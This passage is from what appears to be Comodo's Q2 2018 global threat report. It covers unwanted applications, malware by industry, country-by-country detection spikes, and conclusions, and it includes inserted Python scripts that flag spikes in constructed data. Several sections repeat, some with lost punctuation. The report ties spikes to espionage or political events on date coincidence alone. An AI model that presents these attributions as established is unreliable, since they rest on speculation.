7.7 Iraq

Today there is possibly no hotter topic in information security than election hacking. In this chart showing Comodo malware detections in Iraq in Q2 2018, two clear spikes stand out that we must consider. Both might be associated with recent electoral events. In mid-April Iraq was preparing for a national election, which included the conundrum of how best to secure its electronic dimension. And at the beginning of July Iraq was preparing for a vote recount following accusations of impropriety at the polls.

7.8 Ukraine

Sometimes it is hard to know the reason for a specific spike in malware detections, and sometimes there may be multiple reasons. In this timeline of Comodo malware detections in Ukraine in Q2 2018, there may have been multiple reasons for the highest spike, on May 24. Both of the cited news stories are from May 23: the first discusses Ukraine's Independence Day as well as Ukraine's testing of new military weapons provided by the US government; the second describes a cyberattack that Ukraine feared would target a major sporting event, the Champions League final in Ukraine's capital city, Kyiv, on May 26.

7.9 Croatia

Since the cyberattack that targeted Estonia in 2007, it has been clear that cyberattacks can be used to punish not only individuals and enterprises but also entire nations. In that context, this massive spike in malware detections in Croatia on March 28 is interesting, as it came a mere day after the Russian government called a Croatian government decision to expel a Russian diplomat (in solidarity with London over the alleged poisoning of a former Russian spy in England) an "act of hostility".

7.10 Finland, Russia, USA

Finally, let's have a look at Comodo's virus detections in Finland during Q2 2018. The largest single spike, by far, occurred on the day when the press began to report that Donald Trump and Vladimir Putin would hold a summit in the Finnish capital of Helsinki. Geolocation of this virus activity in Finland revealed that it almost exclusively took place in Helsinki's suburb of Vantaa, precisely where the summit was scheduled to take place. One caveat applies to any such reading: IP geolocation usually resolves to the registered location of an ISP's address block or point of presence rather than to the infected machine itself, so a concentration of hits in a single suburb can be an artifact of the geolocation database rather than a fact about where the machines were.
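Every subsection above identifies its event by a spike that "stands out" in a daily detection timeline. The following is an added example, not code from the Comodo report, that makes that judgement reproducible: it scores each day of a quarter against the series median using the median absolute deviation (MAD), which a handful of extreme days cannot inflate, and returns the days whose score exceeds a threshold. The daily counts are constructed for the example and are not Comodo telemetry; the two injected spikes are placed on dates the report discusses (May 24 and June 4) only so the output is recognizable.

```python
"""Flag the days in a daily malware-detection series that stand out.

Added example, not part of the Comodo report. Uses a robust z-score:
how far a day's count sits above the series median, measured in scaled
median absolute deviations, so a few huge days cannot drag the baseline
up and hide themselves the way a mean/standard-deviation rule would.
"""
from datetime import date, timedelta
from statistics import median


def build_sample_series():
    """Constructed daily counts for a fictional country, Q2 2018 (91 days).

    The baseline jitters deterministically between 90 and 112 detections a
    day; two days are overwritten with injected spikes. These numbers are
    made up for the example and are not Comodo telemetry.
    """
    start = date(2018, 4, 1)
    counts = {start + timedelta(days=i): 90 + (i * 7) % 23 for i in range(91)}
    counts[date(2018, 5, 24)] = 640     # injected spike
    counts[date(2018, 6, 4)] = 1250     # injected spike
    return counts


def robust_zscores(counts):
    """Return {day: robust z} with the median as location and MAD as scale.

    The 1.4826 factor makes MAD comparable to a standard deviation for
    roughly normal data, so a threshold of 5 reads like "5 sigma".
    """
    values = list(counts.values())
    med = median(values)
    mad = median([abs(v - med) for v in values])
    scale = 1.4826 * mad if mad > 0 else 1.0   # guard against a flat series
    return {day: (v - med) / scale for day, v in counts.items()}


def find_spikes(counts, threshold=5.0):
    """Days whose robust z-score is at least `threshold`.

    Returns (day, count, z) tuples sorted by date.
    """
    z = robust_zscores(counts)
    return sorted(
        (day, counts[day], round(z[day], 1))
        for day in counts
        if z[day] >= threshold
    )


if __name__ == "__main__":
    series = build_sample_series()
    for day, count, z in find_spikes(series):
        print(f"{day}  detections={count:5d}  robust_z={z}")
```

Run as a script to list the flagged days. A flagged day says only that the count was unusual for the quarter; tying it to a calendar event, as the report does, remains a manual step. Running the check per malware type (viruses and trojans separately, as in the Belarus subsection) also tells you whether the types really spiked together or whether one category dominates the aggregate.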

8 Conclusions

In Q2, Comodo Cybersecurity observed several new and significant trends likely to radically influence the cybersecurity marketplace and IT end users. These trends not only demonstrate an upswing in malware across the world but presage possible future cybersecurity scenarios.

The fact that trojan malware increased in the last quarter means that the spread of malware in general will be amplified soon. Trojans are a covert weapon, and the cybersecurity industry should assume that many trojan-based attacks that occurred in Q2 remain undetected, with the real impact of these attacks being revealed in quarters to come. Another meaningful fact is that trojans serve as a delivery vector for other types of malware. Combined, these facts point to a huge surge in infections of hosts worldwide with a diversity of malware samples.

Our findings show that malware is becoming more cunning in its delivery methods, more sophisticated in persistence and much harder for antivirus software to detect. The propagation of fileless malware, the evolution of cryptominers and the use of legitimate tools like PowerShell in attacks are clear evidence of this uptick in sophistication.

Mobile devices are becoming more attractive targets for cybercriminals because handsets and tablets contain a variety of valuable information but lack protection comparable to that on desktop systems, presaging new attacks and mobile malware development. As more people use their mobile devices for financial transactions (via banking and e-payment apps) and store confidential information (like messenger correspondence and private pictures), cybercriminals can anticipate rich pickings from exploiting those devices. With successful penetration, perpetrators profit by stealing money, selling confidential information or blackmailing victims.

Moreover, given that the majority of detected trojans in Q2 were information stealers, we can see another dangerous tendency: cybercriminals' accelerating bias toward hunting for confidential data.

Combined, these trends promise a heavy impact on the cybersecurity marketplace and on IT end users in the future, creating changes in the cybersecurity landscape and forcing IT security departments to update their security measures and probably revamp their security strategy, policies and postures.

REQUEST A DEMO

Try Comodo Cybersecurity by speaking with a security consultant to begin the process of setting up a demo or proof-of-concept project. Contact us directly at +1 888-266-6361.

NORTH AMERICA: Comodo Security Solutions, Inc., 1255 Broad Street, Clifton, NJ 07013, United States. Tel: +1 (888) 551 1531, Tel: +1 (888) 266 6361, Int: +1 (703) 581 6361, Fax: +1 (973) 777 4394, sales@comodo.com

EUROPE: Comodo Security Solutions, Inc., Șoseaua Națională 31, Iași 700237, Romania. Tel: +40 332 806 772

ASIA: Comodo Security Solutions Pvt. Ltd., Prestige Office Centre, 183 NSK Salai, Vadapalani, Chennai, India. Tel: +91 44 4562 2800, www.comodo.co.in

© 2018 ALL RIGHTS RESERVED. COMODO SECURITY SOLUTIONS, INC. VISIT COMODO.COM

About Comodo Cybersecurity

Comodo Cybersecurity is a global innovator of cybersecurity solutions, protecting critical information across the digital landscape. Building on its unique position as the world's largest certificate authority, Comodo Cybersecurity authenticates, validates and secures networks and infrastructures from individuals to mid-sized companies to the world's largest enterprises. Comodo Cybersecurity provides complete end-to-end security solutions across the boundary, internal network and endpoint, with innovative technologies solving the most advanced malware threats, both known and unknown. With global headquarters in Clifton, New Jersey, and branch offices in Silicon Valley, Comodo Cybersecurity has international offices in China, India, the Philippines, Romania, Turkey, Ukraine and the United Kingdom. For more information, visit comodo.com. Comodo Cybersecurity and the Comodo Cybersecurity brand are trademarks of the Comodo Cybersecurity Group, Inc. or its affiliates in the US and other countries. Other names may be trademarks of their respective owners. The current list of Comodo Cybersecurity trademarks and patents is available at comodo.com/repository.

Comodo Threat Research Labs monitors, filters and analyzes malware, ransomware, viruses and other "unknown", potentially dangerous files 24/7/365 in over 190 countries around the world. With five offices spread across the Americas, Asia and Europe (and staff covering over 190 countries), the Lab is made up of more than 220 IT security professionals, ethical hackers, computer scientists and engineers (all full-time Comodo Cybersecurity Lab employees) analyzing millions of potential pieces of malware, phishing, spam or other malicious/unwanted files and emails every day. The Lab also works with trusted partners in academia, government and industry to gain additional insights into known and potential threats. CTRL's mission is to use the best combination of cybersecurity technology and innovations, machine learning-powered analytics, artificial intelligence, and human experts and insights to secure and protect Comodo Cybersecurity customers, business and public-sector partners and the public community.


than 220 IT security professionals ethical hackers computer scientists and engineers (all full-time Comodo Cybersecurity Lab employees) analyzing

millions of potential pieces of malware phishing spam or other maliciousunwanted files and emails every day

The Lab also works with trusted partners in academia government and industry to gain additional insights into known and potential

threats CTRLrsquos mission is to use the best combination of cybersecurity technology and innovations machine

learning-powered analytics artificial intelligence and human experts and insights to secure and protect

Comodo Cybersecurity customers business and public-sector partners and the public community

Comodo Cybersecurity is a global innovator of cybersecurity solutions protecting critical information across the digital landscape Building on its unique position as the worldrsquos largest certificate authority Comodo Cybersecurity authenticates validates and secures networks and infrastructures from individuals to mid-sized companies to the worldrsquos largest enterprises Comodo Cybersecurity provides complete end-to-end security solutions across the boundary internal network and endpoint with innovative technologies solving the most advanced malware threats both known and unknown With global headquarters in Clifton New Jersey and branch offices in Silicon Valley Comodo Cybersecurity has international offices in China India the Philippines Romania Turkey Ukraine and the United Kingdom For more information visit comodocom Comodo Cybersecurity and The Comodo Cybersecurity brand are trademarks of the Comodo Cybersecurity Group Inc or its affiliates in the US and other countries Other names may be trademarks of their respective owners The current list of Comodo Cybersecurity trademarks and patents is available at comodocomrepository

About Comodo Cybersecurity

Brought to you by

  • 1 Executive summary
    • 11 Overview
    • 12 New Trends
      • 121 Trojans jumped to the top of the malware list
      • 122 Cryptominers evolved into multifunctional malware
      • 123 Android malware skyrocketed in variety
      • 124 Geopolitical intelligence
          • 2 Trojans going on the offensive to hunt for confidential data
            • 21 The Most Widespread Trojan
            • 22 PowerShell-based attack with Emotet
            • 23 Flawed Ammyy RAT attack based on legitimate software
            • 24 The growth of Flawed Ammyy attacks for Q2
            • 25 Ammyy Admin dissemination around the world for Q2
              • 3 Cryptominer Evolution
                • Going Fileless Killing Competitors Crashing Systems
                • 31 BadShell attacks enterprises
                • 32 WinstarNssmMiner a system killer
                • 33 CoinMiner kills rivals
                • 34 CoinHive changes its skin
                • 35 Cryptocurrency clipboard hijacker intercepts transfers
                  • 4 Android Devices Under Siege
                    • 41 Spying Stealing Mining
                      • 411 KevDroid
                      • 412 Zoo Park
                      • 413 MikeSpy
                      • 414 Xloader
                      • 415 Stalker Spy
                      • 416 Mystery Bot
                      • 417 FakeSpy
                      • 418 RedAlert
                      • 419 Hero Rat
                      • 4110 Sonvpay
                      • 4111 CoinHive
                        • 42 Android Malware Catalogued by Month
                          • 421 April 2018
                          • 422 May 2018
                          • 423 June 2018
                              • 5 Malware in Q2 2018 The Big Picture
                                • 51 Strategic Threat Computer Worms
                                  • 511 Generic Worms
                                  • 512 Net Worms
                                  • 513 Email Worms
                                  • 514 p2p Worms
                                  • 515 IM Worms
                                    • 52 High Threat Malware
                                      • 521 Backdoors
                                      • 522 Viruses
                                      • 523 Trojans
                                      • 524 Exploits
                                        • 53 Medium Threat Malware
                                          • 531 Constructor
                                          • 532 Packers
                                          • 533 Email Flooder
                                          • 534 Virtual Tools
                                          • 535 Jokes
                                            • 54 Low Threat Malware Applications
                                              • 541 Applications
                                              • 542 Unwanted Applications
                                              • 543 Unsafe Applications
                                                  • 6 Vertical analysis
                                                  • 7 Geopolitical Intelligence
                                                    • 71 USA
                                                    • 72 China
                                                    • 73 South Korea
                                                    • 74 North Korea
                                                    • 75 Armenia
                                                    • 76 Belarus
                                                    • 77 Iraq
                                                    • 78 Ukraine
                                                    • 79 Croatia
                                                    • 710 Finland Russia USA
                                                      • 8 Conclusions

Global Threat Report Q2 2018 Edition

Page 59 of 73

5.4.2 Unwanted Applications

The unwanted application malware category is alarming in that, during the course of common computer and Internet activity, users often inadvertently install these applications. For example, they include common adware programs, widely disseminated images, videos, dialers, jokes, gossip and more.

The most common unwanted application that Comodo detected this quarter was DealPly, which Microsoft describes as “poor reputation” software that tries to install additional bundled software, modify the user’s homepage, modify the search provider and/or perform other actions users might not have intended. Such programs include free toolbars, adware and “system optimizers”.

As you can see in the bubble chart, the US is far and away the most common country of detection for unwanted applications in Q2 2018.

And as this timeline shows, this malware type poses not only a large but also a daily challenge to network security in the US.


5.4.3 Unsafe Applications

Unsafe applications are seemingly legitimate programs that are in fact frequently leveraged by coders and hackers with malicious intent. Often they claim to help users with administrative or security functionality but in fact do the opposite; they include fake anti-virus and free Internet Relay Chat (IRC) clients.

The most common unsafe application that Comodo detected in Q2 2018 was AutoKMS, software that can be used to “crack” or patch unregistered copies of Microsoft software. Such programs are referred to as “hacktools” and may be distributed with additional malware that users can install inadvertently.

This malware type is a bit different in that, while the US is currently the most common country of detection, Ukraine (ua) and Russia (ru) are #2 and #3 respectively.

This timeline shows that the US – and to a lesser extent Ukraine – have a steady problem with unsafe applications, while Russia experienced one major spike in Q2 2018.


6 Vertical Analysis

In this section, let’s examine unique malware profiles that Comodo identified within specific “verticals”, or economic sectors. The infographic details unique malware distributions for twenty-two vertical markets or industries, from automotive to travel, covering four dangerous malware types: Backdoors, Trojans, Viruses and Worms. Further, the diagram lists the #1 malware family for each vertical’s top malware type.

Let’s take a closer look at two trojans, Kryptik and Zbot, that were the top detection not only in one but in multiple verticals, clearly making them a current strategic threat across the world.


First, Kryptik. The New Jersey Cybersecurity & Communications Integration Cell reported that Kryptik was first created to obtain information about an infected host’s FTP servers but now has the ability to target email clients, file browsers and file managers. CNET Magazine wrote that Kryptik has been used as a trojan “Clicker” to boost the hit-count of websites and has spread through downloads of Microsoft Silverlight and Adobe Flash. Fortinet noted that in December 2015 Kryptik was found on the networks of Ukrainian power companies during a major cyberattack on that country. Comodo discovered a large outbreak of Kryptik in the US state of Virginia just prior to its gubernatorial election in 2017.

Second, let’s examine “Zbot”, which is another name for the “Zeus” Trojan, undermining Microsoft Windows security since 2007. One of its first uses was to target the United States Department of Transportation. And over a decade later, Zbot is still the top Trojan in the government and transportation verticals. Today the Zeus botnet may be the largest on the Internet, with millions of compromised machines around the world.

Zeus has often been used to steal financial information, such as account numbers and passwords, via keystroke logging and online form grabbing. It has also been used to install ransomware, including CryptoLocker. Zbot is often spread through drive-by downloads and email phishing attacks, sometimes supported by a social engineering scheme that falsely claims that a target’s computer already has a virus and needs to be cleaned.

In conclusion, two points stand out. First, trojans are dangerous malware that can be found within every vertical and can be used for a wide variety of cyberattacks. Second, strategic analysis like this can be used to create unique malware profiles for each vertical and provide valuable cyber intelligence that clarifies primary malware threats and better focuses limited time and resources against them.
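The per-vertical profile that the infographic summarizes (the top malware type per vertical, the #1 family within that type, and the families that top more than one vertical) can be reproduced from raw detection records. The Python below is an added example and is not Comodo’s code: the vertical names, the counts and the families named “Placeholder” are constructed for illustration, and only Zbot, Kryptik and DealPly are taken from the report text.

```python
"""Per-vertical malware profiles from detection records.

Added example, not Comodo's code. Each detection record carries the
customer's vertical, the malware type and the family. For each vertical
we find the most-detected type among the four the report covers, then
the #1 family inside that type, and finally the families that are #1 in
more than one vertical. Vertical names, counts and the "Placeholder"
family names below are constructed; Zbot, Kryptik and DealPly come
from the report text.
"""
from collections import Counter, defaultdict
from typing import NamedTuple

# The four malware types the vertical infographic covers.
PROFILED_TYPES = frozenset({"Backdoor", "Trojan", "Virus", "Worm"})


class Detection(NamedTuple):
    vertical: str
    malware_type: str
    family: str


def _top(counter):
    """Highest count wins; ties break alphabetically so results are deterministic."""
    return min(counter.items(), key=lambda kv: (-kv[1], kv[0]))


def profile_verticals(records):
    """Return {vertical: (top_type, top_family, family_count)}.

    Records whose type is outside PROFILED_TYPES (e.g. adware) are ignored,
    matching the report's four-type breakdown.
    """
    by_vertical = defaultdict(list)
    for rec in records:
        if rec.malware_type in PROFILED_TYPES:
            by_vertical[rec.vertical].append(rec)

    profiles = {}
    for vertical, recs in by_vertical.items():
        top_type, _ = _top(Counter(r.malware_type for r in recs))
        top_family, n = _top(Counter(r.family for r in recs if r.malware_type == top_type))
        profiles[vertical] = (top_type, top_family, n)
    return profiles


def cross_vertical_families(profiles, min_verticals=2):
    """Families that are #1 in at least `min_verticals` verticals.

    This is the signal the report uses to call Kryptik and Zbot strategic threats.
    """
    verticals_by_family = defaultdict(list)
    for vertical, (_, family, _) in profiles.items():
        verticals_by_family[family].append(vertical)
    return {fam: sorted(vs) for fam, vs in verticals_by_family.items()
            if len(vs) >= min_verticals}


def _many(n, vertical, mtype, family):
    return [Detection(vertical, mtype, family)] * n


# Constructed sample telemetry (not real data).
SAMPLE = (
    _many(7, "Government", "Trojan", "Zbot")
    + _many(3, "Government", "Backdoor", "Backdoor.Placeholder.A")
    + _many(5, "Transportation", "Trojan", "Zbot")
    + _many(2, "Transportation", "Trojan", "Kryptik")
    + _many(6, "Energy", "Trojan", "Kryptik")
    + _many(4, "Energy", "Worm", "Worm.Placeholder.A")
    + _many(4, "Retail", "Trojan", "Kryptik")
    + _many(4, "Automotive", "Virus", "Virus.Placeholder.A")
    + _many(3, "Automotive", "Trojan", "Kryptik")
    + _many(9, "Travel", "Adware", "DealPly")        # outside the four types: ignored
    + _many(2, "Travel", "Worm", "Worm.Placeholder.B")
)

if __name__ == "__main__":
    profiles = profile_verticals(SAMPLE)
    for vertical, (mtype, family, n) in sorted(profiles.items()):
        print(f"{vertical:15s} top type: {mtype:9s} #1 family: {family} ({n})")
    print("Families topping multiple verticals:", cross_vertical_families(profiles))
```

Note that the #1 family is chosen only among records of the vertical’s top type, which is how the infographic is described; a family that dominates a minority type in a vertical does not appear in that vertical’s profile.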


7 Geopolitical Intelligence

7.1 USA

This timeline displays a range of the most dangerous malware types detected within the United States in Spring 2018. Clearly, the major spike on March 13 stands out in this data. What happened on this day in the US, and what might help to explain the surge in malware activity? On that day, US President Donald Trump announced the names of his new Secretary of State, Mike Pompeo, and new CIA Director, Gina Haspel. In that light, one likely reason for this dramatic rise in malware detections is that intelligence agencies from around the world suddenly received a raft of new intelligence collection requirements, comprising many requests for information related to upcoming changes in US political, military and intelligence activities, after which these agencies immediately began to fulfill those requirements via computer hacking – commonly called cyber espionage – which today takes place on a far greater scale than the public realizes.


7.2 China

This chart illustrates Comodo’s aggregated malware detections in China for Q2 2018. Clearly, June 4 stands out as the single most prominent day. The reason for this massive spike is that many intelligence services – both foreign and domestic – were likely busy trying to protect and/or collect sensitive information relating to current events within China. Why on June 4? That is the anniversary of the 1989 Tiananmen Square protests.


7.3 South Korea

National security events always attract the attention of professional hackers, who seek to collect the kind of information that serves as the basis for intelligence reporting. This graph shows Comodo trojan horse malware detections in South Korea during Q2 2018. The highest single spikes took place simultaneously with annual joint US-South Korean military exercises. This fact should come as little surprise in the Internet age, when everyone from students to soldiers, spies and statesmen does most of their work online. Students collect data for academic papers; spies collect data for intelligence reports.


7.4 North Korea

The chart above shows Comodo malware detections in North Korea during Q2 2018. At the beginning of May, Comodo saw a spike consisting of well over ten times the usual number of detections. One plausible explanation for this activity is that someone, or some institution, was either briefly more connected to the Internet than usual or was trying to take advantage of this short period of political openness to better connect with the outside world. Comodo did further research on the detected malware and identified it as Windows activation or “cracking” software and Chinese-made anti-censorship programs.


7.5 Armenia

All major geopolitical events today are bathed in malware. The reason is that all activities – from social activities to business, politics or national security affairs – are mostly performed online. This is especially true during times of national crisis, as both government and citizens are in overdrive trying to gather new information – or trying to prevent others from doing the same. Ample evidence is provided by this timeline, which shows that Armenia’s 2018 political revolution was accompanied by Comodo’s largest detection of malware within that country during Q2 2018.


7.6 Belarus

A common hacker refrain is that “information wants to be free”. Evidence for this argument is provided by this timeline, which shows Comodo’s virus and trojan detections in Belarus in Q2 2018. On June 14, as the government in Minsk passed new legislation with a view toward controlling the spread of “fake news”, Comodo detected a massive spike in both viruses and trojans. It is possible that the virus outbreak was specifically used to disseminate trojan horses, which were then leveraged for some real-world purpose: either to gather, deny or manipulate sensitive information related to the new legislation and its impact on Belarusian society.


7.7 Iraq

Today there is possibly no hotter topic in information security than election hacking. In this chart showing Comodo malware detections in Iraq in Q2 2018, two clear spikes stand out that we must consider. Both might be associated with recent electoral incidents. In mid-April, Iraq was preparing for a national election, which included a conundrum on how best to secure its electronic dimension. And at the beginning of July, Iraq was preparing for a vote recount following accusations of impropriety at the polls.


7.8 Ukraine

Sometimes it is hard to know the reason for a specific spike in malware detection – and sometimes there may be multiple reasons. In this timeline of Comodo malware detections in Ukraine in Q2 2018, there may have been multiple reasons for the highest spike, on May 24. Both of the cited news stories are from May 23: the first discusses Ukraine’s Independence Day as well as Ukraine’s testing of new military weapons provided by the US government; the second describes a cyberattack that Ukraine feared would target a major sporting event, the Champions League final in Ukraine’s capital city, Kyiv, on May 26.


7.9 Croatia

Since the cyberattack that targeted Estonia in 2007, it is clear that cyberattacks can be used to punish not only individuals and enterprises but also entire nations. In that context, this massive spike in malware detection in Croatia on March 28 is interesting, as it came a mere day after the Russian government called a Croatian government decision to expel a Russian diplomat (in solidarity with London over the alleged poisoning of a former Russian spy in England) an “act of hostility”.


7.10 Finland, Russia, USA

Finally, let’s have a look at Comodo’s virus detections in Finland during Q2 2018. The largest single spike – by far – occurred on the day when the press began to report that Donald Trump and Vladimir Putin would have a summit in the Finnish capital of Helsinki. Geolocation of this virus activity in Finland revealed that it almost exclusively took place in Helsinki’s suburb of Vantaa – precisely where the summit was scheduled to take place.
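Every subsection in this chapter reads an event off a day-level spike in a detection timeline; 7.4 gives an implicit threshold (well over ten times the usual number of detections) and 7.10 adds a geolocation breakdown of the spike day. The Python below is an added example and is not Comodo’s code or method: it scores each day against the median of the preceding two weeks, flags days at or above a configurable multiple of that baseline, and reports the per-city share of a flagged day’s detections. The dates, daily counts and city names are constructed.

```python
"""Spike detection on a daily malware-detection timeline, with a per-city breakdown.

Added example, not Comodo's code or method. A day is flagged when its
detection count is at least `factor` times the median of the preceding
`window` days, and a flagged day is summarised by the share of its
detections per city. All dates, counts and city names below are
constructed.
"""
from collections import Counter
from datetime import date, timedelta
from statistics import median

# A detection is (ISO date string, city). ISO strings sort chronologically.


def daily_counts(detections):
    """Count detections per day. Days with zero detections are simply absent;
    real telemetry should be zero-filled before scoring so the baseline is honest."""
    return Counter(day for day, _ in detections)


def spike_days(counts, window=14, factor=10.0, min_baseline=1):
    """Return [(day, count, multiple)] for days at or above factor x baseline.

    baseline = median of the previous `window` days, floored at `min_baseline`
    so a quiet sensor never divides by zero. The first `window` days have no
    history and are never flagged.
    """
    days = sorted(counts)
    flagged = []
    for i in range(window, len(days)):
        baseline = max(median(counts[d] for d in days[i - window:i]), min_baseline)
        multiple = counts[days[i]] / baseline
        if multiple >= factor:
            flagged.append((days[i], counts[days[i]], round(multiple, 1)))
    return flagged


def location_shares(detections, day):
    """Share of `day`'s detections per city, largest first."""
    cities = Counter(city for d, city in detections if d == day)
    total = sum(cities.values())
    return [(city, round(n / total, 3)) for city, n in cities.most_common()]


def build_sample():
    """Constructed quarter of telemetry: 18-22 detections/day across two cities,
    plus two injected spikes, one spread like normal traffic and one concentrated
    in a third city (the 7.10 pattern)."""
    start = date(2018, 4, 1)
    detections = []
    for offset in range(91):                      # 2018-04-01 .. 2018-06-30
        day = (start + timedelta(days=offset)).isoformat()
        n = 18 + (offset * 7) % 5                 # deterministic jitter in 18..22
        detections += [(day, "CityA")] * (n - 4) + [(day, "CityB")] * 4
    detections += [("2018-05-02", "CityA")] * 230  # spike 1: 250 total, 12.5x baseline
    detections += [("2018-06-28", "CityC")] * 201  # spike 2: 220 total, 11x, one suburb
    return detections


if __name__ == "__main__":
    dets = build_sample()
    for day, count, mult in spike_days(daily_counts(dets)):
        print(f"{day}: {count} detections, {mult}x the two-week median baseline")
        print("  by city:", location_shares(dets, day))
```

A median baseline is used rather than a mean so that one spike does not inflate the baseline for the following two weeks and mask a second event; the caveat in the `daily_counts` docstring matters in practice, since a sensor that reports nothing on quiet days would otherwise look busier than it is.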


8 Conclusions

In Q2, Comodo Cybersecurity observed several new, significant trends likely to radically influence the cybersecurity marketplace and IT end users. These trends not only demonstrate an upswing in malware across the world but presage possible future cybersecurity scenarios.

The fact that trojan malware increased in the last quarter means that the spread of malware in general will be amplified soon. Trojans are a covert weapon, and the cybersecurity industry should suppose that many trojan-based attacks that occurred in Q2 remain undetected, with the real impact of these attacks being revealed in quarters to come. Another meaningful fact is that trojans serve as a delivery vector for other types of malware. Combined, these facts point to a huge surge in infection of hosts worldwide with a diversity of malware samples.

Our findings show that malware is becoming more cunning in delivery method, more sophisticated in persistence and much harder for antivirus software to detect. Propagation of fileless malware, the evolution of cryptominers and the use of legitimate tools like PowerShell to attack are clear evidence of this uptick in sophistication.

Mobile devices are becoming more attractive targets for cybercriminals because handsets and tablets contain a variety of valuable information but lack protection comparable to that on desktop systems, presaging new attacks and mobile malware development. As more people use their mobile devices for financial transactions (via banking and e-payment apps) and store confidential information (like messenger correspondence and private pictures), cybercriminals can anticipate rich pickings from exploiting those devices. With successful penetration, perpetrators profit by stealing money, selling confidential information or blackmailing victims.

Moreover, given that the majority of detected trojans in Q2 were information stealers, we can see another dangerous tendency: cybercriminals’ accelerating bias toward hunting for confidential data.

Combined, these trends promise a heavy impact on the cybersecurity marketplace and on IT end-users in the future, creating changes in the cybersecurity landscape and forcing IT-security departments to update their security measures and probably revamp their security strategy, policies and postures.

REQUEST A DEMO

Try Comodo Cybersecurity by speaking with a security consultant to begin the process to set up a demo or proof-of-concept project. Contact us directly at +1 888-266-6361.

© 2018 ALL RIGHTS RESERVED. COMODO SECURITY SOLUTIONS, INC.

Visit comodo.com

NORTH AMERICA
Comodo Security Solutions, Inc., 1255 Broad Street, Clifton, NJ 07013, United States. Tel: +1 (888) 551 1531; Tel: +1 (888) 266 6361; Int: +1 (703) 581 6361; Fax: +1 (973) 777 4394; sales@comodo.com

EUROPE
Comodo Security Solutions, Inc., Șoseaua Națională 31, Iași 700237, Romania. Tel: +40 332 806 772

ASIA
Comodo Security Solutions Pvt. Ltd., Prestige Office Centre, 183 NSK Salai, Vadapalani, Chennai, India. Tel: +91 44 4562 2800; www.comodo.co.in

Comodo Threat Research Labs monitors, filters and analyzes malware, ransomware, viruses and other “unknown” potentially dangerous files 24/7/365 in over 190 countries around the world. With 5 offices spread across the Americas, Asia and Europe (and staff covering over 190 countries), the Lab is made up of more than 220 IT security professionals, ethical hackers, computer scientists and engineers (all full-time Comodo Cybersecurity Lab employees) analyzing millions of potential pieces of malware, phishing, spam or other malicious/unwanted files and emails every day. The Lab also works with trusted partners in academia, government and industry to gain additional insights into known and potential threats. CTRL’s mission is to use the best combination of cybersecurity technology and innovations, machine learning-powered analytics, artificial intelligence and human experts and insights to secure and protect Comodo Cybersecurity customers, business and public-sector partners and the public community.

About Comodo Cybersecurity

Comodo Cybersecurity is a global innovator of cybersecurity solutions, protecting critical information across the digital landscape. Building on its unique position as the world’s largest certificate authority, Comodo Cybersecurity authenticates, validates and secures networks and infrastructures from individuals to mid-sized companies to the world’s largest enterprises. Comodo Cybersecurity provides complete end-to-end security solutions across the boundary, internal network and endpoint with innovative technologies solving the most advanced malware threats, both known and unknown. With global headquarters in Clifton, New Jersey and branch offices in Silicon Valley, Comodo Cybersecurity has international offices in China, India, the Philippines, Romania, Turkey, Ukraine and the United Kingdom. For more information, visit comodo.com. Comodo Cybersecurity and the Comodo Cybersecurity brand are trademarks of the Comodo Cybersecurity Group Inc. or its affiliates in the US and other countries. Other names may be trademarks of their respective owners. The current list of Comodo Cybersecurity trademarks and patents is available at comodo.com/repository.



Global Threat Report Q2 2018 Edition

Page 66 of 73

74 North Korea

The chart above shows Comodo malware detections in North Korea during Q2 2018 At the beginning of May Comodo saw a spike consisting of well over ten times the number of usual detections One plausible explanation for this activity is that someone or some institution was either briefly more connected to the Internet than usual or was trying to take advantage of this short period of political openness to better connect with the outside world Comodo did further research on the detected malware and identified it as Windows activation or ldquocrackingrdquo software and Chinese-made anti-censorship programs

Global Threat Report Q2 2018 Edition

Page 67 of 73

75 Armenia

All major geopolitical events today are bathed in malware The reason is that all activities ndash from social activities to business politics or national security affairs ndash are mostly performed online This is especially true during times of national crisis as both government and citizen are in overdrive trying to gather new information ndash or trying to prevent others from doing the same Ample evidence is provided by this timeline which shows that Armeniarsquos 2018 political revolution was accompanied by Comodorsquos largest detection of malware within that country during Q2 2018

Global Threat Report Q2 2018 Edition

Page 68 of 73

76 Belarus

A common hacker refrain is that ldquoinformation wants to be freerdquo Evidence for this argument is provided by this timeline which shows Comodorsquos Virus and Trojan detections in Belarus in Q2 2018 On June 14 as the government in Minsk passed new legislation with a view toward controlling the spread of ldquofake newsrdquo Comodo detected a massive spike in both viruses and trojans It is possible that the virus outbreak was specifically used to disseminate trojan horses which were then leveraged for some real-world purpose either to gather deny or manipulate sensitive information related to the new legislation and its impact on Belarus society

Global Threat Report Q2 2018 Edition

Page 69 of 73

77 Iraq

Today there is possibly no hotter topic in information security than election hacking In this chart showing Comodo malware detections in Iraq in Q2 2018 two clear spikes stand out that we must consider Both might be associated with recent electoral incidents In mid-April Iraq was preparing for a national election which included a conundrum on how best to secure its electronic dimension And at the beginning of July Iraq was preparing for a vote recount following accusations of impropriety at the polls

Global Threat Report Q2 2018 Edition

Page 70 of 73

78 Ukraine

Sometimes it is hard to know the reason for a specific spike in malware detection ndash and sometimes there may be multiple reasons In this timeline of Comodo malware detections in Ukraine in Q2 2018 there may have been multiple reasons for the highest spike on May 24 Both of the cited news stories are from May 23 the first discusses Ukrainersquos Independence Day as well as Ukrainersquos testing of new military weapons provided by the US government the second describes a cyberattack that Ukraine feared would target a major sporting event the Champions League final in Ukrainersquos capital city Kyiv on May 26

Global Threat Report Q2 2018 Edition

Page 71 of 73

79 Croatia

Since the cyberattack that targeted Estonia in 2007 it is clear that cyberattacks can be used to punish not only individuals and enterprises but also entire nations In that context this massive spike in malware detection in Croatia on March 28 is interesting as it came a mere day after the Russian government called a Croatian government decision to expel a Russian diplomat (in solidarity with London over the alleged poisoning of a former Russian spy in England) an ldquoact of hostilityrdquo

Global Threat Report Q2 2018 Edition

Page 72 of 73

710 Finland Russia USA

Finally letrsquos have a look at Comodorsquos virus detections in Finland during Q2 2018 The largest single spike ndash by far ndash occurred on the day when the press began to report that Donald Trump and Vladimir Putin would have a summit in the Finnish capital of Helsinki Geolocation of this Virus activity in Finland revealed that it almost exclusively took place in Helsinkirsquos suburb of Vantaa ndash precisely where the summit was scheduled to take place

Global Threat Report Q2 2018 Edition

Page 73 of 73

8 Conclusions In Q2 Comodo Cybersecurity observed several new significant trends likely to radically influence the cybersecurity marketplace and IT end users These trends not only demonstrate an upswing in malware across the world but presage possible future cybersecurity scenarios

